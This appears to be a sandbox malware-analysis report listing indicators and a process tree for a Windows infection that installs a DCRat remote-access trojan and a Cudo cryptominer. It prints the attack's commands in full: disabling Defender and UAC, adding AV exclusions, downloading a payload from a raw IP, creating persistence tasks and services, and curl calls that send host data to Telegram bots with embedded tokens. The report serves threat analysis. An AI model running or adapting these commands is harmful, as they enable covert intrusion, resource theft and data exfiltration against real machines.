Token: SeAssignPrimaryTokenPrivilege	2276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2276	WMIC.exe
Token: SeSecurityPrivilege	2276	WMIC.exe
Token: SeTakeOwnershipPrivilege	2276	WMIC.exe
Token: SeLoadDriverPrivilege	2276	WMIC.exe
Token: SeSystemtimePrivilege	2276	WMIC.exe
Token: SeBackupPrivilege	2276	WMIC.exe
Token: SeRestorePrivilege	2276	WMIC.exe
Token: SeShutdownPrivilege	2276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2276	WMIC.exe
Token: SeUndockPrivilege	2276	WMIC.exe
Token: SeManageVolumePrivilege	2276	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2036	cmd.exe
Token: SeIncreaseQuotaPrivilege	2036	cmd.exe
Token: SeSecurityPrivilege	2036	cmd.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

IntelConfigService.exeApplicationsFrameHost.exeSuperfetch.exe

pid	process
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1192	ApplicationsFrameHost.exe
1360	Superfetch.exe
1360	Superfetch.exe
1360	Superfetch.exe
1360	Superfetch.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

1.exe~Ma4650.exe

pid process

2692 1.exe
4440 ~Ma4650.exe
4440 ~Ma4650.exe
4440 ~Ma4650.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.exedc.exeany.execmd.execmd.execmd.exestil.execmd.execudo.execmd.execmd.exe

description	pid	process	target process
PID 3348 wrote to memory of 4816	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 4816	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 4816	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 1960	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 1960	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 1960	3348	tmp.exe	powershell.exe
PID 3348 wrote to memory of 2692	3348	tmp.exe	1.exe
PID 3348 wrote to memory of 2692	3348	tmp.exe	1.exe
PID 3348 wrote to memory of 2692	3348	tmp.exe	1.exe
PID 3348 wrote to memory of 1780	3348	tmp.exe	cmd.exe
PID 3348 wrote to memory of 1780	3348	tmp.exe	cmd.exe
PID 3348 wrote to memory of 1780	3348	tmp.exe	cmd.exe
PID 3348 wrote to memory of 3048	3348	tmp.exe	dc.exe
PID 3348 wrote to memory of 3048	3348	tmp.exe	dc.exe
PID 3348 wrote to memory of 3048	3348	tmp.exe	dc.exe
PID 3348 wrote to memory of 2924	3348	tmp.exe	any.exe
PID 3348 wrote to memory of 2924	3348	tmp.exe	any.exe
PID 3348 wrote to memory of 2924	3348	tmp.exe	any.exe
PID 1780 wrote to memory of 1020	1780	cmd.exe	cmd.exe
PID 1780 wrote to memory of 1020	1780	cmd.exe	cmd.exe
PID 1780 wrote to memory of 1020	1780	cmd.exe	cmd.exe
PID 3348 wrote to memory of 1656	3348	tmp.exe	cudo.exe
PID 3348 wrote to memory of 1656	3348	tmp.exe	cudo.exe
PID 3348 wrote to memory of 1656	3348	tmp.exe	cudo.exe
PID 3048 wrote to memory of 4648	3048	dc.exe	cmd.exe
PID 3048 wrote to memory of 4648	3048	dc.exe	cmd.exe
PID 3048 wrote to memory of 4648	3048	dc.exe	cmd.exe
PID 2924 wrote to memory of 3684	2924	any.exe	cmd.exe
PID 2924 wrote to memory of 3684	2924	any.exe	cmd.exe
PID 2924 wrote to memory of 3684	2924	any.exe	cmd.exe
PID 1020 wrote to memory of 4732	1020	cmd.exe	chcp.com
PID 1020 wrote to memory of 4732	1020	cmd.exe	chcp.com
PID 1020 wrote to memory of 4732	1020	cmd.exe	chcp.com
PID 4648 wrote to memory of 1668	4648	cmd.exe	stil.exe
PID 4648 wrote to memory of 1668	4648	cmd.exe	stil.exe
PID 4648 wrote to memory of 1668	4648	cmd.exe	stil.exe
PID 3684 wrote to memory of 680	3684	cmd.exe	chcp.com
PID 3684 wrote to memory of 680	3684	cmd.exe	chcp.com
PID 3684 wrote to memory of 680	3684	cmd.exe	chcp.com
PID 1668 wrote to memory of 4968	1668	stil.exe	WScript.exe
PID 1668 wrote to memory of 4968	1668	stil.exe	WScript.exe
PID 1668 wrote to memory of 4968	1668	stil.exe	WScript.exe
PID 1020 wrote to memory of 1944	1020	cmd.exe	powershell.exe
PID 1020 wrote to memory of 1944	1020	cmd.exe	powershell.exe
PID 1020 wrote to memory of 1944	1020	cmd.exe	powershell.exe
PID 1668 wrote to memory of 1824	1668	stil.exe	cmd.exe
PID 1668 wrote to memory of 1824	1668	stil.exe	cmd.exe
PID 1668 wrote to memory of 1824	1668	stil.exe	cmd.exe
PID 3684 wrote to memory of 4152	3684	cmd.exe	forfiles.exe
PID 3684 wrote to memory of 4152	3684	cmd.exe	forfiles.exe
PID 3684 wrote to memory of 4152	3684	cmd.exe	forfiles.exe
PID 1824 wrote to memory of 3440	1824	cmd.exe	cmd.exe
PID 1824 wrote to memory of 3440	1824	cmd.exe	cmd.exe
PID 1824 wrote to memory of 3440	1824	cmd.exe	cmd.exe
PID 1656 wrote to memory of 4020	1656	cudo.exe	cmd.exe
PID 1656 wrote to memory of 4020	1656	cudo.exe	cmd.exe
PID 1656 wrote to memory of 4020	1656	cudo.exe	cmd.exe
PID 3440 wrote to memory of 4024	3440	cmd.exe	curl.exe
PID 3440 wrote to memory of 4024	3440	cmd.exe	curl.exe
PID 3440 wrote to memory of 4024	3440	cmd.exe	curl.exe
PID 3684 wrote to memory of 4236	3684	cmd.exe	findstr.exe
PID 3684 wrote to memory of 4236	3684	cmd.exe	findstr.exe
PID 3684 wrote to memory of 4236	3684	cmd.exe	findstr.exe
PID 4020 wrote to memory of 1284	4020	cmd.exe	sc.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

Processes:

Idle.exesavesdhcpcommon.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesdhcpcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	savesdhcpcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	savesdhcpcommon.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:228

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:4432

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5104

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4652

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4424

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3884

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3048

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:684

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1144

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4336

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2564

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
5⤵
PID:5012

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1016

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
- Executes dropped EXE
PID:212

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:2372

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
6⤵
- Executes dropped EXE
PID:1832

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1808

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="block vilnerabliti" dir=in protocol=TCP localport=88 action=block
6⤵
- Modifies Windows Firewall
PID:3404

C:\Windows\SysWOW64\net.exe
net start WMService
6⤵
PID:3556

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
6⤵
- Modifies Windows Firewall
PID:3524

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2212

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4764

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:4808

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
4⤵
PID:3948

C:\Windows\SysWOW64\findstr.exe
FindStr .
5⤵
PID:1372

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC CPU Get Name /Value
5⤵
PID:1832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
4⤵
PID:1944

C:\Windows\SysWOW64\find.exe
FIND.EXE "="
5⤵
PID:4992

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost Path Win32_VideoController Get Name /Value
5⤵
PID:4984

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1484

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:424

\??\c:\windows\curl.exe
c:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="GBQHURCCCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"
4⤵
- Executes dropped EXE
PID:1148

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\migration\stil.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4648

\??\c:\windows\migration\stil.exe
"c:\windows\migration\stil.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\windows\migration\uolU0W2BGm0r9qjOq.vbe"
5⤵
- Checks computer location settings
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Migration\U3nsXCQPB8MSTcQAVhWLtxfj6wb.bat" "
6⤵
PID:2824

C:\windows\migration\savesdhcpcommon.exe
"C:\windows\migration\savesdhcpcommon.exe"
7⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\windows\migration\savesdhcpcommon.exe'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\windows\migration\Idle.exe'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\windows\migration\Idle.exe
"C:\windows\migration\Idle.exe"
8⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\migration\JSavDJfGkqsqiENdifm.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "c:\windows\system32\curl.exe --insecure --data chat_id=552691400 --data parse-mode=markdown --data-urlencode text="GBQHURCCDCRat_INSTALLED" "https://api.telegram.org/bot5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM/sendMessage""
6⤵
- Suspicious use of WriteProcessMemory
PID:3440

\??\c:\windows\SysWOW64\curl.exe
c:\windows\system32\curl.exe --insecure --data chat_id=552691400 --data parse-mode=markdown --data-urlencode text="GBQHURCCDCRat_INSTALLED" "https://api.telegram.org/bot5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM/sendMessage"
7⤵
PID:4024

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "
3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:680

C:\Windows\SysWOW64\forfiles.exe
forfiles /p C:\ProgramData\AnyDesk\ /s /m service.conf /c "cmd /c @if exist @file (@goto 9) "
4⤵
PID:4152

C:\Windows\SysWOW64\findstr.exe
findstr "f16068f1baa86c5d6fcb17179a1aa79461274b2e6011f358d740be2b61143fcf" C:\ProgramData\AnyDesk\service.conf
4⤵
PID:4236

C:\Windows\SysWOW64\sc.exe
sc query type= service
4⤵
- Launches sc.exe
PID:3672

C:\Windows\SysWOW64\findstr.exe
findstr /i "AnyDesk"
4⤵
PID:4440

C:\Windows\SysWOW64\sc.exe
sc query type= service
4⤵
- Launches sc.exe
PID:4896

C:\Windows\SysWOW64\findstr.exe
findstr /i "Task Schedubler"
4⤵
PID:4800

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
PID:1644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:4880

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:4980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:4312

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print
5⤵
PID:3708

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\SysWOW64\net.exe
net start TaskSc
4⤵
PID:3900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TaskSc
5⤵
PID:1828

C:\Windows\SysWOW64\net.exe
net start AnyDesk
4⤵
PID:2212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start AnyDesk
5⤵
PID:3124

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 60 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3352

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
PID:3584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:960

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:3668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:2604

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:1080

C:\Windows\SysWOW64\net.exe
net start TaskSc
4⤵
PID:4692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TaskSc
5⤵
PID:5084

C:\Windows\SysWOW64\net.exe
net start AnyDesk
4⤵
PID:4804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start AnyDesk
5⤵
PID:4888

\??\c:\windows\curl.exe
c:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="GBQHURCC'id:''ip:'" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"
4⤵
- Executes dropped EXE
PID:3052

C:\programdata\cudo.exe
"C:\programdata\cudo.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program files\Cudo Miner\run.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\SysWOW64\sc.exe
Sc create TaskScudo1 binPath="C:\Program files\Cudo Miner\Cudo Miner.exe" DisplayName="Task Schedubler1 cudo" type=own start=auto
4⤵
- Launches sc.exe
PID:1284

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3176

C:\Windows\SysWOW64\sc.exe
Sc create TaskScudo binPath= "C:\Program files\Cudo Miner\Cudo Miner.exe" DisplayName= "Task Schedubler cudo" type= own start= auto
4⤵
- Launches sc.exe
PID:5068

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4844

C:\Windows\SysWOW64\net.exe
net start TaskScudo1
4⤵
PID:3968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TaskScudo1
5⤵
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\windows\migration\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\windows\migration\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\windows\migration\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2376

C:\Program files\Cudo Miner\Cudo Miner.exe
"C:\Program files\Cudo Miner\Cudo Miner.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Program files\Cudo Miner\Cudo Miner Core.exe
"Cudo Miner Core"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "fltmc"
3⤵
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "chcp"
3⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "chcp"
3⤵
PID:3180

C:\Windows\system32\chcp.com
chcp
4⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "nslookup -search -type=TXT miner"
3⤵
PID:2440

C:\Windows\system32\nslookup.exe
nslookup -search -type=TXT miner
4⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netstat -r"
3⤵
PID:5088

C:\Windows\system32\NETSTAT.EXE
netstat -r
4⤵
- Gathers network information
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh lan show profiles"
3⤵
PID:2452

C:\Windows\system32\netsh.exe
netsh lan show profiles
4⤵
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe nic get MACAddress, name, NetEnabled, Speed, NetConnectionStatus, AdapterTypeId /value"
3⤵
PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe nicconfig get dhcpEnabled /value"
3⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "ipconfig /all"
3⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4852

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2036

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe cpu get /value"
3⤵
PID:4484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe path Win32_CacheMemory get CacheType,InstalledSize,Purpose"
3⤵
PID:1016

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe path Win32_CacheMemory get CacheType,InstalledSize,Purpose
4⤵
PID:1376

C:\Program Files\Cudo Miner\bin\cudo-gpu-info.exe
"C:\Program Files\Cudo Miner\bin\cudo-gpu-info.exe" "{\"resourcePath\":\"C:\\Program Files\\Cudo Miner\\runtime\"}"
3⤵
- Executes dropped EXE
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1716

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3284

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4424

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4644

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1512

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3404

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4852

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3176

C:\Windows\system32\cmd.exe
